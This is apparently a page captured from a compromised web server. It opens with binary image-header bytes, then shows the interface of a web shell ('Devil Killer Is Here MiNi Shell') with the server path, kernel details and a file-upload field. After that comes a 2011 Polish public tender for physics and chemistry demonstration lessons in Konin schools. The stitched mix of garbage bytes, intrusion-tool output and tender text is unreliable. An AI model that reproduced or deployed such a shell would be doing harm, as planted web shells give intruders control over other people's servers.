JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110105/4985-N-2011.html

<p class="kh_header"><b>Konin: Zlecenie na wykonanie usług Lekcji Pokazowych świadczonych w ramach projektu Gimnazjalna Akademia Nauk dla subregionu konińskiego w ramach działania 9.1.2 (ZP-1/2011)</b><br>
<b>Numer ogłoszenia: 4985 - 2011; data zamieszczenia: 05.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego S.A. w Koninie , ul. Zakładowa 4, 62-510 Konin, woj. wielkopolskie, tel. 63 2453095, faks 63 2422229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arrkonin.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja Rozwoju Regionalnego S.A. w Koninie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zlecenie na wykonanie usług Lekcji Pokazowych świadczonych w ramach projektu Gimnazjalna Akademia Nauk dla subregionu konińskiego w ramach działania 9.1.2 (ZP-1/2011).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie Lekcji Pokazowych świadczonych w ramach projektu Gimnazjalna Akademia Nauk dla subregionu konińskiego w ramach działania 9.1.2 w roku szkolnym 2010/2011 z następujących przedmiotów:
2.2 	Lekcje Pokazowe z fizyki - Część I 
Przedmiotem zamówienia jest przeprowadzenie:
a)	maksymalnie 43 Lekcji Pokazowych (z tym, że jedna Lekcja Pokazowa może odbyć się w jednej grupie), na rzecz Zamawiającego na podstawie umowy nr POKL.09.01.02-30-084/09-00,
b)	w miejscu  realizacji - szkołach gimnazjalnych zgodnie z załącznikiem nr 1 do Umowy (Lista szkół gimnazjalnych ze wskazaniem ilości grup w danej szkole), 
c)	zajęć zgodnie z ustalonym formularzem Harmonogramu zajęć stanowiącym  załącznik nr 2 do Umowy. 

2.2.1	W trakcie realizacji usługi  Wykonawca zobowiązuje się:
a)	przygotować program zajęć multimedialnych z pokazem i warsztatów, zapewniających zapoznanie się ucznia z ciekawymi zjawiskami fizycznymi. Program zajęć multimedialnych z pokazem i warsztatów powinien zainteresować uczniów oraz powinien być dostosowany do umiejętności i wiedzy przeciętnego ucznia w gimnazjum,
b)	przeprowadzić zajęcia multimedialne z pokazem z fizyki składające się z dwóch części: Zajęć multimedialnych z pokazem - zajęcia eksperymentalne z wykorzystaniem tablicy interaktywnej (czas trwania 1 godzina zegarowa z 15 min. przerwą) oraz Warsztatów fizycznych - zajęcia warsztatowe, na których uczniowie pracują samodzielnie (czas trwania,  2 godziny zegarowe z 15 min przerwą). Czas trwania jednej Lekcji Pokazowej składającej się z dwóch części to 3 godziny zegarowe. 
c)	zawrzeć w programie zagadnienia związane z:
-      elektromagnetyzmem, a w szczególności z:
-	nanomagnetyzmem, działo magnetyczne (nanotechnologią) [Nobel z fizyki 2010],
-	kształtem linii pola magnetycznego (ciecz ferromagnetyczna),
-	wzbudzaniem pola elektromagnetycznego oraz jego wpływem na organizmy żywe;
-	optyką, a w szczególności z:
-	transmisją światła poprzez włókna optyczne [Nobel z fizyki 2009],
-	zjawiskiem załamania światła w zależności od badanego ośrodka,
-	zjawiskiem fluorescencji ciał stałych oraz cieczy,
-	zjawiskiem dyfrakcji światła,
-	wpływem zmian natężenia światła na organizmy żywe;
	-	budową materii, a w szczególności z:
-	budową i własnościami kondensatu Bosego-Einsteina [Nobel z fizyki 2001],
-	budową i własnościami cieczy nienewtonowskiej,
-	budową i własnościami zawiesin (na przykładzie lampy żelowej)
-	oraz inne zgodnie z tematyką,
d)	wykorzystać możliwości tablicy interaktywnej w trakcie prowadzonych zajęć oraz zapewnić w części warsztatowej  samodzielne wykonanie eksperymentów przez uczniów, a także udzielić wyjaśnień dotyczących nurtujących ich problemów,
e)	zapewnić urządzenia oraz materiały używane do wykonywanych ćwiczeń i prowadzenia warsztatów,
f)	przygotować Harmonogram zajęć realizowanych w 20 szkołach gimnazjalnych oraz przekazać Zamawiającemu w terminie 2 tygodni od daty podpisania umowy,
g)	przekazać każdemu uczniowi broszury z omówieniem prezentowanych doświadczeń.


2.3	Lekcje Pokazowe z chemii - Część II 

Przedmiotem zamówienia jest przeprowadzenie:
a)	maksymalnie 43 Lekcji Pokazowych (z tym, że jedna Lekcja Pokazowa może odbyć się w 1 grupie), na rzecz Zamawiającego  na podstawie  umowy nr POKL.09.01.02-30-084/09- 00,
b)	w  miejscu realizacji - w szkołach gimnazjalnych zgodnie z Załącznikiem nr 1 do Umowy Lista szkół gimnazjalnych z wskazaniem ilości grup w danej szkole, 
c)	zajęć zgodnie z ustalonym formularzem Harmonogramu zajęć stanowiącym Załącznik nr 2 do Umowy.

2.3.1	W trakcie realizacji usługi Wykonawca  zobowiązuje się:
a)	przygotować program zajęć multimedialnych i warsztatów zapewniających zapoznanie się ucznia z ciekawymi zjawiskami chemicznymi i przyrodniczymi. Program  zajęć multimedialnych i warsztatów powinien zainteresować uczniów oraz powinien być dostosowany do umiejętności i wiedzy przeciętnego ucznia w gimnazjum,
b)	przeprowadzić Zajęcia multimedialne i warsztaty z chemii składające się z dwóch części: I - Zajęć wspomaganych multimedialnie - zajęcia eksperymentalne z tablicą interaktywną i nowoczesnymi pomocami dydaktycznymi (czas trwania 1,5 godziny zegarowej z 15 minutową przerwą) oraz II- przeprowadzenia warsztatów (1,5 godziny zegarowej). Czas trwania jednej lekcji składającej się z dwóch części to 3 godziny zegarowe. W części warsztatowej każdy uczeń powinien mieć szansę samodzielnie wykonać eksperymenty, wśród których muszą znaleźć się: 
- otrzymywanie chloru i badanie jego właściwości wybielających, 
- określanie obecności chlorowodoru w powietrzu i badanie jego odczynu,
- reakcje w roztworach wodnych (wytrącanie soli i reakcje barwne),
- typy reakcji chemicznych: analizy, wymiany, syntezy,
- i inne, zgodne z tematyką Chemia w służbie środowiska - w technice chemii w małej skali - polecanej przez twórców obowiązującej podstawy programowej z chemii, uzyskać wyjaśnienia dotyczące nurtujących go problemów, nauczyć się poprawnie dydaktycznie opisywać doświadczenia, natomiast w części wspomaganej multimedialnie każdy uczeń powinien mieć szansę na przeprowadzenie kilku efektownych doświadczeń chemicznych, wśród których muszą znaleźć się:
- rozkład termiczny soli (np.: galusanu bizmutu(III)),
- bezpieczne mieszaniny zapalne w zmniejszonej skali (np. azotany(V)) - minimum 3 barwy płomienia powstałe w wyniku inicjacji,
- mieszaniny wybuchowe w zmniejszonej skali (np.: mieszanina powietrza z wodorem, fosforu z solami wybuchowymi) - minimum jedna mieszanina w stałym stanie skupienia oraz jedna w stanie gazowym,
- reakcje otrzymywania tlenku węgla(IV) (np.: z reakcji kwasu octowego z sodą oczyszczoną),
- spalanie pierwiastków w tlenie (siarki, fosforu, węgla),
- badanie właściwości węgla (jego rola w przyrodzie i zastosowanie w nanotechnologii - np. nanorurki <Nobel z Fizyki 2010>),
- współczesne ogniwa paliwowe (nowoczesne technologie, prezentacja mechanizmu działania urządzeń napędzanych w wyniku reakcji elektrolizy),
- doświadczenia z użyciem katalizatorów (np.: katalityczne rozkłady roztworu nadtlenku wodoru, współczesne katalizatory - biokatalizatory <jak działają, jak je otrzymać>).
uczeń musi mieć również umożliwioną pracę z tablicą interaktywną (gry dydaktyczne, krzyżówki, szarady, łamigłówki, plansze interaktywne) oraz pracę z systemem bezprzewodowego głosowania (ankiety, quizy). Zadania interaktywne muszą stanowić oprawę dydaktyczną do pokazu.  
c)	wykorzystać możliwości tablicy interaktywnej w trakcie prowadzonych zajęć oraz zapewnić w części warsztatowej samodzielne wykonanie eksperymentów przez uczniów, a także udzielić wyjaśnień dotyczących nurtujących ich problemów,
d)	zapewnić urządzenia oraz materiały używane do wykonywanych ćwiczeń i prowadzenia warsztatów,
e)	przygotować Harmonogram zajęć  realizowanych w 20 szkołach gimnazjalnych oraz przekazać Zamawiającemu w terminie 2 tygodni od daty podpisania umowy,
f)	przekazać każdemu uczniowi broszury z omówieniem prezentowanych doświadczeń.


W opisach Lekcji Pokazowych podano maksymalną ilość lekcji, które mogą ulec zmniejszeniu. 
Zapłata będzie następować za faktycznie wykonaną usługę (rzeczywistą liczbę przeprowadzonych Lekcji Pokazowych), na podstawie faktury wystawionej raz na kwartał.

Za jedną Lekcję Pokazową ustala się jednorazowe przeprowadzenie Zajęć Pokazowych dla jednej grupy.
2.4	Zamawiający dopuszcza składnie ofert częściowych. Wykonawca może złożyć tylko jedną ofertę (na jedną lub dwie części). Jeżeli wykonawca pragnie złożyć ofertę na więcej , niż jedną część jest zobowiązany do złożenia odrębnych ofert finansowych, na odrębnych formularzach ofertowych  w jednej kopercie.
2.5	Zamawiający dopuszcza powierzenie wykonania części zamówienia podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu spełnienia tego warunku. Ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu spełnienia tego warunku. Ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu spełnienia tego warunku. Ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonywania zamówienia
Wykonawca ubiegający się o zamówienie musi wskazać minimum 4 osoby, posiadające  wykształcenie wyższe z przygotowaniem pedagogicznym (minimum licencjat), oraz dwuletni staż pracy w charakterze nauczyciela fizyki i/lub chemii stosownie do części 1 i 2 zamówienia, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. Nr 50, poz. 400). Ocena spełniania warunku odbędzie się na podstawie analizy treści wypełnionego formularza wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz na podstawie złożonego oświadczenia, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu spełnienia tego warunku. Ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień umowy w sytuacji gdy:
	a) zmiana jest dla niego korzystna,
	b) w przypadku ustawowej zmiany stawki VAT
	c) w przypadku wystąpienia sytuacji od stron niezależnej, niemożliwej do przewidzenia w chwili zawarcia umowy, a wprowadzenie zmiany jest konieczne dla prawidłowej realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.arrkonin.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego S.A. w Koninie, ul. Zakładowa 4, 62-510 Konin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2011 godzina 10:00, miejsce: Agencja Rozwoju Regionalnego S.A. w Koninie, ul. Zakładowa 4, 62-510 Konin, , Sekretariat, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PO KL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Lekcje Pokazowe z fizyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lekcje Pokazowe z fizyki - Część I 
Przedmiotem zamówienia jest przeprowadzenie:
a)	maksymalnie 43 Lekcji Pokazowych (z tym, że jedna Lekcja Pokazowa może odbyć się w jednej grupie), na rzecz Zamawiającego na podstawie umowy nr POKL.09.01.02-30-084/09-00,
b)	w miejscu  realizacji - szkołach gimnazjalnych zgodnie z załącznikiem nr 1 do Umowy (Lista szkół gimnazjalnych ze wskazaniem ilości grup w danej szkole), 
c)	zajęć zgodnie z ustalonym formularzem Harmonogramu zajęć stanowiącym  załącznik nr 2 do Umowy. 

2.2.1	W trakcie realizacji usługi  Wykonawca zobowiązuje się:
a)	przygotować program zajęć multimedialnych z pokazem i warsztatów, zapewniających zapoznanie się ucznia z ciekawymi zjawiskami fizycznymi. Program zajęć multimedialnych z pokazem i warsztatów powinien zainteresować uczniów oraz powinien być dostosowany do umiejętności i wiedzy przeciętnego ucznia w gimnazjum,
b)	przeprowadzić zajęcia multimedialne z pokazem z fizyki składające się z dwóch części: /Zajęć multimedialnych z pokazem/ - zajęcia eksperymentalne z wykorzystaniem tablicy interaktywnej (czas trwania 1 godzina zegarowa z 15 min. przerwą) oraz /Warsztatów fizycznych/ - zajęcia warsztatowe, na których uczniowie pracują samodzielnie (czas trwania,  2 godziny zegarowe z 15 min przerwą). Czas trwania jednej Lekcji Pokazowej składającej się z dwóch części to 3 godziny zegarowe. 
c)	zawrzeć w programie zagadnienia związane z:
-      elektromagnetyzmem, a w szczególności z:
-	nanomagnetyzmem, działo magnetyczne (nanotechnologią) [Nobel z fizyki 2010],
-	kształtem linii pola magnetycznego (ciecz ferromagnetyczna),
-	wzbudzaniem pola elektromagnetycznego oraz jego wpływem na organizmy żywe;
-	optyką, a w szczególności z:
-	transmisją światła poprzez włókna optyczne [Nobel z fizyki 2009],
-	zjawiskiem załamania światła w zależności od badanego ośrodka,
-	zjawiskiem fluorescencji ciał stałych oraz cieczy,
-	zjawiskiem dyfrakcji światła,
-	wpływem zmian natężenia światła na organizmy żywe;
	-	budową materii, a w szczególności z:
-	budową i własnościami kondensatu Bosego-Einsteina [Nobel z fizyki 2001],
-	budową i własnościami cieczy nienewtonowskiej,
-	budową i własnościami zawiesin (na przykładzie lampy żelowej)
-	oraz inne zgodnie z tematyką,
d)	wykorzystać możliwości tablicy interaktywnej w trakcie prowadzonych zajęć oraz zapewnić w części warsztatowej  samodzielne wykonanie eksperymentów przez uczniów, a także udzielić wyjaśnień dotyczących nurtujących ich problemów,
e)	zapewnić urządzenia oraz materiały używane do wykonywanych ćwiczeń i prowadzenia warsztatów,
f)	przygotować Harmonogram zajęć realizowanych w 20 szkołach gimnazjalnych oraz przekazać Zamawiającemu w terminie 2 tygodni od daty podpisania umowy,
g)	przekazać każdemu uczniowi broszury z omówieniem prezentowanych doświadczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Lekcje pokazowe z chemii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lekcje Pokazowe z chemii - Część II 

Przedmiotem zamówienia jest przeprowadzenie:
a)	maksymalnie 43 Lekcji Pokazowych (z tym, że jedna Lekcja Pokazowa może odbyć się w 1 grupie), na rzecz Zamawiającego  na podstawie  umowy nr POKL.09.01.02-30-084/09- 00,
b)	w  miejscu realizacji - w szkołach gimnazjalnych zgodnie z Załącznikiem nr 1 do Umowy Lista szkół gimnazjalnych z wskazaniem ilości grup w danej szkole, 
c)	zajęć zgodnie z ustalonym formularzem Harmonogramu zajęć stanowiącym Załącznik nr 2 do Umowy.

2.3.1	W trakcie realizacji usługi Wykonawca  zobowiązuje się:
a)	przygotować program zajęć multimedialnych i warsztatów zapewniających zapoznanie się ucznia z ciekawymi zjawiskami chemicznymi i przyrodniczymi. Program  zajęć multimedialnych i warsztatów powinien zainteresować uczniów oraz powinien być dostosowany do umiejętności i wiedzy przeciętnego ucznia w gimnazjum,
b)	przeprowadzić Zajęcia multimedialne i warsztaty z chemii składające się z dwóch części: I - Zajęć wspomaganych multimedialnie - zajęcia eksperymentalne z tablicą interaktywną i nowoczesnymi pomocami dydaktycznymi (czas trwania 1,5 godziny zegarowej z 15 minutową przerwą) oraz II- przeprowadzenia warsztatów (1,5 godziny zegarowej). Czas trwania jednej lekcji składającej się z dwóch części to 3 godziny zegarowe. W części warsztatowej każdy uczeń powinien mieć szansę samodzielnie wykonać eksperymenty, wśród których muszą znaleźć się: 
- otrzymywanie chloru i badanie jego właściwości wybielających, 
- określanie obecności chlorowodoru w powietrzu i badanie jego odczynu,
- reakcje w roztworach wodnych (wytrącanie soli i reakcje barwne),
- typy reakcji chemicznych: analizy, wymiany, syntezy,
- i inne, zgodne z tematyką Chemia w służbie środowiska - w technice chemii w małej skali - polecanej przez twórców obowiązującej podstawy programowej z chemii, uzyskać wyjaśnienia dotyczące nurtujących go problemów, nauczyć się poprawnie dydaktycznie opisywać doświadczenia, natomiast w części wspomaganej multimedialnie każdy uczeń powinien mieć szansę na przeprowadzenie kilku efektownych doświadczeń chemicznych, wśród których muszą znaleźć się:
- rozkład termiczny soli (np.: galusanu bizmutu(III)),
- bezpieczne mieszaniny zapalne w zmniejszonej skali (np. azotany(V)) - minimum 3 barwy płomienia powstałe w wyniku inicjacji,
- mieszaniny wybuchowe w zmniejszonej skali (np.: mieszanina powietrza z wodorem, fosforu z solami wybuchowymi) - minimum jedna mieszanina w stałym stanie skupienia oraz jedna w stanie gazowym,
